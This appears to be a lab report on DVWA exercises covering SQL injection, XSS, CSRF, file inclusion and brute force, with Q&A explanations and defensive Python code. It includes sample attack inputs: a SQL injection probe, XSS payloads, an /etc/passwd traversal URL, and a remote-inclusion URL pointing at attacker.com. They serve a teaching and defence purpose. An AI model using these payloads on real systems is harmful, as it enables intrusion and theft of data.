
EXPERIMENT 1

1) WHAT IS SQL INJECTION IN DVWA?

SQL injection is a type of security vulnerability that occurs when an attacker can manipulate
an SQL query by injecting arbitrary SQL code into a query that is executed by a database.
This can happen when an application fails to properly sanitize user input before including it
in SQL statements. SQL injection can allow attackers to access or manipulate the database in
unauthorized ways, potentially leading to data breaches, data corruption, or even full system
compromise.

2) WHY IS IT CALLED SQL INJECTION?

SQL injection is called "injection" because the attacker "injects" malicious SQL code into a
query. This injected code alters the intended execution of the SQL query in ways that
compromise the security of the application.

3) WHAT IS AN SQL COMMAND?

SQL commands are used to perform various operations on the data stored in databases.
These commands can be categorized into several types based on their functionality:

1 DDL (Data Definition Language)
2 DML (Data Manipulation Language)
3 DCL (Data Control Language)
4 TCL (Transaction Control Language)
5 DQL (Data Query Language)

4) WHAT TOOL IS USED FOR SQL INJECTION?

1. SQLMap

Description: SQLMap is one of the most popular and powerful open-source
tools for automating the process of detecting and exploiting SQL injection
flaws. It supports a wide range of databases, including MySQL, PostgreSQL,
Oracle, Microsoft SQL Server, and others.

Key Features:

- Automatic SQL injection and database takeover tool.
- Supports various injection techniques (Boolean-based blind, time-based blind,
error-based, UNION query-based, and others).
- Database fingerprinting, data fetching from the database, accessing the
underlying file system, and executing commands on the operating system.

5) WHAT IS THE WEAKNESS OF SQL INJECTION?

- Unauthorized Data Access: Allows attackers to retrieve sensitive data from
databases.
- Data Manipulation: Enables modification or deletion of database records.
- Bypass Authentication: Can bypass login mechanisms to gain unauthorized
access.
- Code Execution: In some cases, allows execution of arbitrary commands on
the server.
- Denial of Service (DoS): Can be used to disrupt services by overloading
servers.
- Compliance Risks: Non-compliance with data protection laws due to data
breaches.
- Detection Complexity: Not easily detected by traditional security measures
like firewalls.
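The flaw described in questions 1 and 2, shown as an added example that is not part of the original report or of DVWA: a user-ID lookup built by string concatenation beside the same lookup with a bound parameter and an allow-list check. The table rows are constructed for the demo and SQLite is used in place of DVWA's MySQL.

```python
import sqlite3

# Constructed sample rows standing in for a users table (not DVWA's own data).
SAMPLE_USERS = [
    (1, "admin", "admin@example.test"),
    (2, "gordonb", "gordonb@example.test"),
]


def build_db():
    """Create an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Concatenate the raw parameter into the statement (the flaw the report describes)."""
    # A value such as  1' OR '1'='1  closes the quoted literal and appends its own
    # condition, so the WHERE clause is always true and every row comes back.
    query = "SELECT username, email FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Bind the parameter as data: the same string is compared as one literal value."""
    query = "SELECT username, email FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def is_valid_user_id(user_id):
    """Allow-list validation layered on top of parameterisation: ids are digits only."""
    return user_id.isdigit()


if __name__ == "__main__":
    db = build_db()
    probe = "1' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, probe))        # both rows
    print("parameterized:", lookup_parameterized(db, probe))  # []
    print("validated:", is_valid_user_id(probe))              # False
```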

EXPERIMENT 2

1. What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to
inject malicious scripts into web pages viewed by other users. This occurs
when web applications display untrusted data without proper validation or
escaping.

2. What are the types of XSS attacks?

- Reflected XSS: Injected script reflects off a web application to the user.
- Stored XSS: Injected script is permanently stored on the target server.
- DOM-based XSS: Client-side JavaScript writes untrusted data into the DOM, so the
injection happens in the browser rather than in the server's response.

3. What do you mean by reflective XSS?

Reflective XSS occurs when an attacker injects a script that is reflected off the web
server, typically in response to a user's request. This script is then executed by the
user's browser.

4. Define Persistent XSS. Why is it called Stored XSS?

Persistent XSS (Stored XSS) involves injecting a malicious script that is permanently
stored on the target server, such as in a database. It's called "Stored" because the
injected script persists and can affect multiple users who access the affected web
page.

5. Are all web applications vulnerable to XSS attacks? Why or why not?

Not all web applications are vulnerable to XSS attacks. Vulnerability depends on
how the application handles and sanitizes user input. Proper input validation, output
encoding, and security practices can mitigate XSS vulnerabilities.

6. Is it possible to prevent XSS in most cases without any user interaction?

Yes, XSS prevention is possible through various security measures such as input
validation, output encoding, and using Content Security Policy (CSP). These
measures can be implemented without requiring specific user actions.
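Output encoding per context, as question 6 recommends, shown as an added example that is not part of the original report: a stored comment rendered into an element body and a reflected search term rendered into an attribute, each unsafe and then escaped, plus the CSP header a defender would send alongside. The comment, search term and CSP value are constructed for the demo.

```python
import html
import re

# Constructed inputs (not from the report): a stored comment and a reflected search term.
STORED_COMMENT = "<script>alert(1)</script>"
SEARCH_TERM = '"><img src=x onerror=alert(1)>'

# Example Content-Security-Policy a defender sends in addition to output encoding;
# it blocks inline script even if one rendering is missed.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def render_comment_unsafe(comment):
    """Stored XSS: the saved comment is echoed into the page body verbatim."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """Element-body context: escaping <, > and & makes the browser treat it as text."""
    return '<div class="comment">' + html.escape(comment, quote=False) + "</div>"


def render_search_unsafe(term):
    """Reflected XSS: the query parameter is echoed back into an attribute value."""
    return '<input name="q" value="' + term + '">'


def render_search_safe(term):
    """Attribute context: quotes must be escaped as well, or the value breaks out."""
    return '<input name="q" value="' + html.escape(term, quote=True) + '">'


def tags_in(rendered, allowed=("div", "input")):
    """Crude check used here only to show which rendering still carries foreign tags."""
    found = {m.lower() for m in re.findall(r"<\s*/?\s*([a-zA-Z]+)", rendered)}
    return found - set(allowed)


if __name__ == "__main__":
    print(tags_in(render_comment_unsafe(STORED_COMMENT)))  # {'script'}
    print(tags_in(render_comment_safe(STORED_COMMENT)))    # set()
    print(tags_in(render_search_unsafe(SEARCH_TERM)))      # {'img'}
    print(tags_in(render_search_safe(SEARCH_TERM)))        # set()
```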

EXPERIMENT 3

1) What is CSRF?

CSRF (Cross-Site Request Forgery) is a type of attack where a malicious website
tricks a user's web browser into performing actions on another website where the user
is authenticated. The attack exploits the trust that a web application has in a user's
browser.

2) How do you check if your application is vulnerable to CSRF attacks?

- Manual Testing: Attempt to perform actions on your application through
unauthorized means (e.g., modifying parameters in form submissions).
- Automated Tools: Use tools like OWASP ZAP, Burp Suite, or CSRFTester to
simulate CSRF attacks and detect vulnerabilities.
- Code Review: Review the application's code to ensure proper implementation of
CSRF tokens and other mitigation techniques.

3) What's the difference between XSS and CSRF?

- XSS (Cross-Site Scripting): Involves injecting malicious scripts into a web
application that are executed in the context of other users.
- CSRF (Cross-Site Request Forgery): Involves tricking a user into unknowingly
submitting a request that they did not intend to execute, using their authenticated
session in another web application.

4) In what ways can you mitigate CSRF risks?

- CSRF Tokens: Include a unique, unpredictable token in each form submission or
request and validate it server-side to confirm the origin and intent of the request.
- SameSite Cookies: Set cookies to SameSite=Strict or SameSite=Lax so the browser
does not attach the session cookie to cross-site requests.
- Verify Origin: Check the Origin or Referer header in requests to verify the request's
origin.
- Double-Submit Cookie: Send the same random value as both a cookie and a request
parameter and reject the request if the two do not match.
- Custom Headers: Use custom headers or authentication mechanisms that cannot be
automatically included in a cross-site request.

5) Mention some examples of how a CSRF attack might occur.

- Unauthorized Transactions: An attacker tricks a user into clicking a link that makes
a transaction (e.g., funds transfer) using the user's session in a banking application.
- Changing Account Settings: An attacker forces a user to change their password or
email address on a web service without their knowledge.
- Social Media Post: An attacker posts a message or shares content on a social media
platform using the victim's authenticated session.
- Data Manipulation: An attacker modifies data, such as deleting records or updating
settings, by exploiting the victim's active session in a vulnerable application.
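Two of the mitigations from question 4 combined, as an added example that is not part of the original report: a per-session CSRF token bound with an HMAC, verified with a constant-time compare, and an Origin/Referer check, both applied before a state-changing request (the funds transfer from question 5) is accepted. The server secret, the site origin app.example.test and the session ids are constructed for the demo.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed for the demo: a real deployment loads the secret from configuration.
SERVER_SECRET = secrets.token_bytes(32)
ALLOWED_ORIGIN = "https://app.example.test"  # hypothetical origin of the application


def issue_csrf_token(session_id):
    """Synchronizer token: a nonce tied to this session by an HMAC over (session, nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):   # missing token or wrong shape
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_allowed(headers):
    """Accept only requests whose Origin (or, failing that, Referer) is our own site."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False          # no way to tell where it came from: refuse
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == ALLOWED_ORIGIN


def accept_transfer(session_id, headers, form):
    """Gate for a state-changing request: both checks must pass."""
    return origin_allowed(headers) and verify_csrf_token(session_id, form.get("csrf_token"))


if __name__ == "__main__":
    tok = issue_csrf_token("sess-A")
    print(accept_transfer("sess-A", {"Origin": ALLOWED_ORIGIN}, {"csrf_token": tok}))  # True
    print(accept_transfer("sess-A", {"Origin": "https://evil.example.test"}, {"csrf_token": tok}))  # False
```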

EXPERIMENT 4

1) What are the different types of file inclusion?

File inclusion vulnerabilities typically fall into two main types:

 Local File Inclusion (LFI): Exploits the ability to include files that are
already present on the server.
 Remote File Inclusion (RFI): Exploits the ability to include files from a
remote server.

2) What is remote file inclusion?

Remote File Inclusion (RFI) is a type of vulnerability where an attacker can
manipulate input parameters to include files from a remote server into a web
application's execution context. This allows the attacker to execute malicious
code hosted on their server.

3) Why is file inclusion possible?

File inclusion vulnerabilities arise due to improper input validation or
sanitization in web applications. When input parameters (such as file paths or
URLs) are not properly validated, attackers can manipulate them to include
arbitrary files, leading to security breaches.

4) Differentiate between local file inclusion and remote file inclusion.

- Local File Inclusion (LFI):
o Exploits include files that already exist on the server.
o Files are typically included using relative or absolute paths.
o Example: http://example.com/index.php?page=../../../etc/passwd
- Remote File Inclusion (RFI):
o Exploits include files from a remote server controlled by the attacker.
o Files are included using URLs or other remote file paths.
o Example: http://example.com/index.php?page=http://attacker.com/malicious.php

5) What is the impact of file inclusion vulnerability?

The impact of a file inclusion vulnerability can be severe:

- Data Exposure: Attackers can read sensitive files such as configuration files,
user credentials, or system files.
- Code Execution: Inclusion of malicious files can lead to remote code
execution, allowing attackers to take control of the server.
- Server Compromise: Attackers can use file inclusion to install backdoors,
malware, or perform further attacks on the server or other systems.
- Data Manipulation: Files can be modified or deleted, leading to data loss or
corruption.
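The validation that question 3 says is missing, as an added example that is not part of the original report: the page parameter is classified (RFI, traversal, unknown, ok) for logging, and an include path is only produced for allow-listed page names that also resolve inside the pages directory. The directory /var/www/app/pages and the page names are hypothetical; the two example URLs from question 4 are the inputs.

```python
import os
from urllib.parse import urlsplit

# Hypothetical layout (not DVWA's): templates live here and only these names exist.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


def classify_request(page_param, base_dir=PAGES_DIR):
    """Label a ?page= value the way a log reviewer would: rfi, lfi-traversal, unknown or ok."""
    # Any URL scheme (http://, ftp://, php://, data:) means a remote or wrapper include.
    if urlsplit(page_param).scheme:
        return "rfi"
    # Resolve ../ sequences and symlinks, then insist the result is still under base_dir.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, page_param))
    if os.path.commonpath([candidate, base_real]) != base_real:
        return "lfi-traversal"
    return "ok" if page_param in ALLOWED_PAGES else "unknown"


def resolve_include(page_param, base_dir=PAGES_DIR):
    """Return the absolute file to include, or None if the request must be refused."""
    if "\x00" in page_param:          # NUL bytes historically truncated include paths
        return None
    if classify_request(page_param, base_dir) != "ok":
        return None
    # The allow-list already decided; the realpath check is defence in depth.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, page_param + ".php"))
    if os.path.commonpath([candidate, base_real]) != base_real:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("home", "../../../etc/passwd",
                  "http://attacker.com/malicious.php", "php://filter/resource=home"):
        print(f"{value!r}: {classify_request(value)} -> {resolve_include(value)}")
```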

EXPERIMENT 5

1) How do dictionary attacks relate to brute force attacks?

Relation: Dictionary attacks are a subset of brute force attacks. While
brute force attacks systematically try every possible combination of
characters to crack passwords or keys, dictionary attacks use a
predefined list (dictionary) of commonly used passwords or phrases.

2) Which type of attack allows an attacker to use a brute-force approach?

Brute Force Attack: This type of attack allows an attacker to use a
brute-force approach by systematically trying every possible
combination of characters until the correct one is found. It is effective
against weak passwords or encryption keys.

3) How long does a dictionary attack take?

Duration: The time taken for a dictionary attack depends on factors
such as the size of the dictionary, the complexity of passwords being
targeted, and the computing power available to the attacker. It can
range from seconds to days or even longer for more complex
passwords.

4) What are the techniques used in preventing a brute force attack?

Techniques:

- Strong Password Policies: Encourage or enforce the use of complex
passwords with a mix of characters, numbers, and symbols.
- Account Lockout: Temporarily lock user accounts after a certain
number of failed login attempts.
- Rate Limiting: Restrict the number of login attempts per unit of time
to prevent rapid-fire attacks.
- CAPTCHA: Implement CAPTCHA challenges to distinguish human
users from automated bots.
- Two-Factor Authentication (2FA): Require a second form of
verification in addition to passwords, such as a code sent to a mobile
device.

5) What are the targets of brute force attacks?

Targets: Brute force attacks typically target:

- User Accounts: To gain unauthorized access by guessing passwords.
- Encryption Keys: To decrypt encrypted data or communications.
- Network Protocols: To exploit weak authentication mechanisms in services
like SSH, FTP, or web applications.
- Cryptographic Hashes: To crack hashed passwords stored in databases.
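The account-lockout and rate-limiting techniques from question 4 implemented together, as an added example that is not part of the original report: a guard consulted before the password check that refuses a source IP exceeding a sliding-window attempt budget and refuses an account once it has accumulated too many consecutive failures. The thresholds and the injectable clock are constructed for the demo; note that per-username lockout alone lets an attacker lock other users out, which is why the per-IP limit sits in front of it.

```python
import time
from collections import deque

MAX_FAILURES = 5           # consecutive failures before the account is locked
LOCKOUT_SECONDS = 900      # 15 minute lockout
RATE_WINDOW_SECONDS = 60   # sliding window for the per-IP limit
RATE_MAX_ATTEMPTS = 10     # attempts allowed per window per source IP


class LoginGuard:
    """In-memory login throttle; a real service would back this with shared storage."""

    def __init__(self, clock=time.time):
        self.clock = clock          # injectable so the behaviour can be tested offline
        self.failures = {}          # username -> consecutive failure count
        self.locked_until = {}      # username -> unix time the lock expires
        self.attempts = {}          # ip -> deque of attempt timestamps in the window

    def _rate_limited(self, ip):
        now = self.clock()
        window = self.attempts.setdefault(ip, deque())
        while window and now - window[0] > RATE_WINDOW_SECONDS:
            window.popleft()        # drop attempts older than the window
        if len(window) >= RATE_MAX_ATTEMPTS:
            return True
        window.append(now)
        return False

    def check(self, username, ip):
        """Call before verifying the password. Returns a refusal reason or None."""
        if self._rate_limited(ip):
            return "rate_limited"
        if self.locked_until.get(username, 0) > self.clock():
            return "locked"
        return None

    def record(self, username, success):
        """Call after verifying the password to update the failure counters."""
        if success:
            self.failures.pop(username, None)
            self.locked_until.pop(username, None)
            return
        count = self.failures.get(username, 0) + 1
        self.failures[username] = count
        if count >= MAX_FAILURES:
            self.locked_until[username] = self.clock() + LOCKOUT_SECONDS
            self.failures[username] = 0   # a fresh budget once the lock expires
```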
